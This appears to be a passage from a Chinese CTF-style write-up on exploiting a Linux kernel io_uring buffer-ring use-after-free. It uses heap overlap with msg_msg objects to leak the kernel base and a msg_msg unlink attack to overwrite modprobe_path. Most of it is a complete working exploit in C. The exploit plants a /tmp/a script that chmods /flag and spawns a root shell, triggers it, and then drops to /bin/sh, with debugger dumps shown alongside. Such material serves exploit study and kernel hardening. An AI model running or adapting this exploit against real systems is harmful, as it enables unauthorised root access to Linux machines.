利用堆重叠可以覆盖位于 UAF msg_msg 下方的另一个 msg_msg,然后溢出读取这个 msg_msg 下方的 io_ring_ctx 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
tmp = (uint64_t*)msg->mtext; /* 申请到msg_msg+0x60,覆盖new msg_msg */
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死,不然会导致crash

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800; // 伪造循环链表节点
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
print_hex(io_ring_ctx, 0x200);

计算出内核基地址后,就可以考虑打 msg_msg unlink attack,往 modprobe_path 中写入自定义脚本的路径

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死不然会导致crash

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");
sleep(2);

if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

用同样的方法控制 msg_msg,不过这次的目的是修改 msg_msg.m_list

1
2
3
4
5
6
7
8
100:08000xffff888005bfd800 —▸ 0xffffffff82e51258 ◂— 0x0
101:08080xffff888005bfd808 ◂— 0x612f706d742f /* '/tmp/a' */
102:08100xffff888005bfd810 ◂— 0x1
103:08180xffff888005bfd818 ◂— 0xfd0
104:08200xffff888005bfd820 —▸ 0xffff888005bfd420 ◂— 0xffff888005bfd420
105:08280xffff888005bfd828 —▸ 0xffff888005bfd840 ◂— 0x6161616161616161 ('aaaaaaaa')
106:08300xffff888005bfd830 ◂— 0x6161616161616161 ('aaaaaaaa')
107:08380xffff888005bfd838 ◂— 0x6161616161616161 ('aaaaaaaa')

最后触发 msg_msg unlink attack 即可完成提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <linux/io_uring.h>
#include <stdatomic.h>

#include "kernelpwn.h"

#define MSG_QUEUE_NUM 0x10

#define PAGE_SIZE 0x1000
#define BUFFER_LEN (PAGE_SIZE * 8)
#define PBUF_BASE ((void*)0x1000)

#define IORING_REGISTER_PBUF_RING (22)
#define IORING_UNREGISTER_PBUF_RING (23)

#define IORING_OP_PROVIDE_BUFFERS (31)

/*
 * Memory-ordering helpers built on C11 atomics: a release store and an
 * acquire load through a pointer p, cast to the _Atomic-qualified type of *p.
 */
#define io_uring_smp_store_release(p, v) \
atomic_store_explicit((_Atomic typeof(*(p))*)(p), (v), \
memory_order_release)

#define io_uring_smp_load_acquire(p) \
atomic_load_explicit((_Atomic typeof(*(p))*)(p), \
memory_order_acquire)

/*
 * Argument block passed to io_uring_register() for the PBUF_RING opcodes.
 * Local copy of the structure the quoted kernel code reads with
 * copy_from_user(); presumably declared here because the installed headers
 * lack it -- TODO confirm.
 */
struct io_uring_buf_reg {
__u64 ring_addr; /* user address of the ring; kernel requires it non-zero and page aligned */
__u32 ring_entries; /* number of ring entries; kernel requires a power of two */
__u16 bgid; /* buffer group id */
__u16 pad; /* must be zero */
__u64 resv[3]; /* must be zero */
};

/*
 * Local definition of a submission queue entry, used for the entries mapped
 * at IORING_OFF_SQES. Declared under a different name than the system
 * header's struct -- presumably so the buf_group/file_index members are
 * available regardless of the installed header version (TODO confirm).
 */
struct new_io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
};
__u64 __pad2[2];
};

int uring_fd;
char* buffer;
struct new_io_uring_sqe* sqes;
unsigned *sring_tail, *sring_mask, *sring_array, *cring_head;
int msgid[MSG_QUEUE_NUM];

/*
 * Thread entry point (started with pthread_create).
 *
 * Calls msgrcv() on msgid[0] for a message of type PBUF_BASE, receiving up to
 * PAGE_SIZE bytes into res. The caller expects this call not to return; if
 * it does, a diagnostic is printed.
 *
 * Returns NULL. The original fell off the end of a function declared to
 * return void *, leaving the thread's exit value indeterminate.
 */
void* worker(void* res)
{
msgrcv(msgid[0], res, PAGE_SIZE, (long)PBUF_BASE, 0);
puts("shouldn't get here");
return NULL;
}

/*
 * Map len bytes of zero-filled, private, anonymous, read/write memory.
 *
 * base: requested address; when non-NULL the mapping is made with MAP_FIXED
 *       and must land exactly there. When NULL the kernel picks the address.
 * len:  size of the mapping in bytes.
 *
 * On failure err_exit("mmap") is called, followed by exit(-1).
 * Returns the start of the mapping.
 */
void* do_mmap(void* base, size_t len)
{
    const int prot = PROT_READ | PROT_WRITE;
    const int map_flags = base ? (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED)
                               : (MAP_ANONYMOUS | MAP_PRIVATE);

    void* mapping = mmap(base, len, prot, map_flags, -1, 0);

    int map_failed = ((size_t)mapping == (size_t)-1);
    int wrong_place = (base != NULL) && (mapping != base);
    if (map_failed || wrong_place) {
        err_exit("mmap");
        exit(-1);
    }

    /* Explicitly clear the region before handing it out. */
    memset(mapping, '\x00', len);
    return mapping;
}

/*
 * Raw wrapper for the io_uring_setup system call.
 *
 * entries: requested number of submission queue entries.
 * p:       parameter block passed through to the kernel unchanged.
 *
 * Returns the syscall() result truncated to int.
 */
int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
    long rc = syscall(__NR_io_uring_setup, entries, p);

    return (int)rc;
}

/*
 * Raw wrapper for the io_uring_register system call.
 *
 * fd:      io_uring file descriptor.
 * opcode:  IORING_REGISTER_* / IORING_UNREGISTER_* operation.
 * arg:     opcode-specific argument, passed through unchanged.
 * nr_args: opcode-specific argument count.
 *
 * Returns the syscall() result truncated to int.
 */
int io_uring_register(unsigned int fd, unsigned int opcode,
                      void* arg, unsigned int nr_args)
{
    long rc = syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);

    return (int)rc;
}

/*
 * Raw wrapper for the io_uring_enter system call.
 *
 * ring_fd:      io_uring file descriptor.
 * to_submit:    number of submission entries to submit.
 * min_complete: number of completions to wait for.
 * flags:        IORING_ENTER_* flags.
 *
 * The last two syscall arguments are always passed as NULL and 0.
 * Returns the syscall() result truncated to int.
 */
int io_uring_enter(int ring_fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags)
{
    long rc = syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
                      flags, NULL, 0);

    return (int)rc;
}

/*
 * Submit the request currently described in sqes[0] and consume one
 * completion.
 *
 * Uses the globals set up by init_io_uring(): sring_array, sring_tail,
 * cring_head and uring_fd. The caller fills in *sqes before calling.
 */
void submit_provide_buffer(void){
/* Point slot 0 of the submission index array at SQE 0. */
io_uring_smp_store_release(&sring_array[0], 0);

/* Advance the submission tail by one with a release store. */
int tail = *sring_tail;
tail++;
io_uring_smp_store_release(sring_tail, tail);

/* Submit one entry and wait for one completion. NOTE(review): ret is never checked. */
int ret = io_uring_enter(uring_fd, 1, 1, IORING_ENTER_GETEVENTS);

/* Advance the completion head by one; the completion entry itself is not read. */
int head = io_uring_smp_load_acquire(cring_head);
head++;
io_uring_smp_store_release(cring_head, head);
}

/*
 * Create the io_uring instance used by the rest of the program and map its
 * rings into this process.
 *
 * Sets the globals uring_fd, sring_tail, sring_mask, sring_array, sqes,
 * cring_head and buffer (a zeroed BUFFER_LEN scratch mapping).
 *
 * NOTE(review): the results of io_uring_setup() and of the three mmap()
 * calls are not checked.
 */
void init_io_uring(void){ /* kmalloc-2k */
struct io_uring_params p = {0};

/* One-entry ring; the kernel fills p with the ring offsets used below. */
uring_fd = io_uring_setup(0x1, &p);
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
int sqes_sz = p.sq_entries * sizeof(struct new_io_uring_sqe);

/* Submission ring: tail index, mask and the index array. */
unsigned char* sq_ptr = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);

sring_tail = (unsigned int*)(sq_ptr + p.sq_off.tail);
sring_mask = (unsigned int*)(sq_ptr + p.sq_off.ring_mask);
sring_array = (unsigned int*)(sq_ptr + p.sq_off.array);

sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES); /* submission queue entries */

/* Completion ring: only the head index is used. */
unsigned char* cq_ptr = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);

cring_head = (unsigned int*)(cq_ptr + p.cq_off.head);

/* do_mmap() handles mapping failure itself (err_exit/exit), so this NULL check looks unreachable. */
buffer = do_mmap(0, BUFFER_LEN);
if (buffer == NULL) {
err_exit("malloc buffer");
}
}

/*
 * Issue an IORING_REGISTER_PBUF_RING request for buffer group 0 on uring_fd
 * with a ring address of 0xF00000000 and 0x20000000 entries.
 *
 * Per the accompanying write-up, this request is meant to fail inside the
 * kernel's page-pinning step so that the registration error path runs for
 * bgid 0 -- the starting point of the analysis.
 *
 * Returns the io_uring_register() result.
 */
int do_free_first(void)
{
int ret;

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg)); /* pad and resv[] stay zero */
reg.ring_addr = 0xF00000000;
reg.ring_entries = 0x20000000;
reg.bgid = 0x0;

ret = io_uring_register(uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1);
return ret;
}

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 2048 - 320*2 = 1408
*/
char fake_secondary_msg[1408];

/*
 * Program entry point: runs the stages described in the write-up in order.
 * The stage comments below restate the write-up's own annotations.
 *
 * NOTE(review): save_status(), unshare_setup(), err_exit(), SOCKET_NUM,
 * kernel_offset and kernel_base are not defined in this file; presumably
 * they come from "kernelpwn.h" -- TODO confirm. sk_sockets, socket_fd,
 * victim_addr and victim_qid are declared but never used here.
 */
int main(int argc , char **argv, char **envp)
{
int ret;
int sk_sockets[SOCKET_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;

save_status();
unshare_setup();

init_io_uring();

/* Create MSG_QUEUE_NUM System V message queues with keys 1234..1234+N-1. */
for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget((key_t)1234 + i, 0666 | IPC_CREAT | IPC_EXCL)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

/* Send a 0x420-byte message (0x30 header + payload) on queue 0. */
struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

/* Provide one buffer (addr = PBUF_BASE mapping, len = 0xFD0) to buffer group 0. */
void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = (uint64_t)pbuf;
sqes->len = 0xFD0;
sqes->buf_group = 0;
submit_provide_buffer();

/* Provide two more buffers to buffer group 0x21 (per the write-up: 0x420 / 0x20 = 0x21). */
for (int i = 0; i < 0x2; i++) {
sqes->addr = (uint64_t)malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21;
submit_provide_buffer();
}

puts("submit_provide_buffer");

/* Busy-wait until the worker thread's msgrcv() has overwritten the tag in buffer. */
uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef){
}
//print_hex(buffer,0xf80);

/* Derive the io_bl address from the value received at buffer + 0x18. */
uint64_t io_bl = *((uint64_t*)(buffer + 0x18)) - 0x420;
printf("io_bl = 0x%lx\n",io_bl);

/* Send a 0x800-byte message on queue 2, then create a second io_uring instance. */
msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0);

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p);

/* Receive (and thereby release) the message sent on queue 0. */
ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0);

/* IDX(x): index into mtext (as uint64_t[]) of the byte at offset x from the start of a 0x30-byte-header message. */
#define IDX(x) (((x)-0x30) / 8)

/* Fill in the payload fields the write-up labels as fake io_buffer_list entries at offsets 0x40 and 0x80. */
uint64_t* tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x40)] = io_bl + 0x60;
tmp[IDX(0x48)] = io_bl;
tmp[IDX(0x50)] = 0x10000;
tmp[IDX(0x60)] = io_bl + 0x68;
tmp[IDX(0x68)] = 0xdeadbeef;

tmp[IDX(0x80)] = io_bl + 0xa0;
tmp[IDX(0x88)] = io_bl;
tmp[IDX(0x90)] = 0x10000;
tmp[IDX(0xa0)] = io_bl + 0x1000;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0);

/* Unregister the buffer ring of group 2 on the first ring. */
struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);

/* Build the payload for queue 3; offsets are relative to a message starting 0x60 bytes in (per the write-up). */
tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

/* Receive from queue 2 and interpret the data past the first 0x800-byte object as the neighbouring io_ring_ctx. */
msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
//print_hex(io_ring_ctx, 0x200);

/* Compute the kernel slide from the pointer at offset 0x420; the constants are specific to the kernel build used in the write-up. */
kernel_offset = io_ring_ctx[0x420 / 8] - 0xffffffff810a8470;
kernel_base = kernel_offset + 0xffffffff81000000;
uint64_t modprobe_path = kernel_offset + 0xFFFFFFFF82E51260;

printf("io_ring_ctx->fallback_work: 0x%lx\n",io_ring_ctx[0x420 / 8]);
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);
printf("modprobe_path: 0x%lx\n",modprobe_path);

/* Repeat the send/receive/resend sequence on queues 4, 3 and 5 with list fields referring to modprobe_path. */
msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8;
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; /* the bytes "/tmp/a" */
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");

/* The final receive on queue 4 is done in a child process. */
if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

/* Give the child time to run, then print the current modprobe path. */
sleep(2);
int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(fd, buffer, 0x10);
puts(buffer);
close(fd);

/* NOTE(review): open() is called with O_CREAT but without the mode argument, here and for /tmp/asd below. */
fd = open("/tmp/a", O_RDWR|O_CREAT);
char *script = "#!/bin/sh\nchmod 777 /flag\nsetsid cttyhack setuidgid 0 /bin/sh\n";
write(fd, script, strlen(script));
close(fd);
system("chmod 777 /tmp/a");

/* Create and execute a file whose content is four 0xff bytes (presumably to make the kernel run the modprobe helper -- TODO confirm). */
int ff = open("/tmp/asd", O_WRONLY | O_CREAT);
write(ff, "\xff\xff\xff\xff", 4);
close(ff);

system("chmod 777 /tmp/asd; /tmp/asd");
if(fork()==0)
system("/bin/sh");

/* Keep the parent process alive indefinitely. */
puts("alive");
while (1)
;

return 0;
}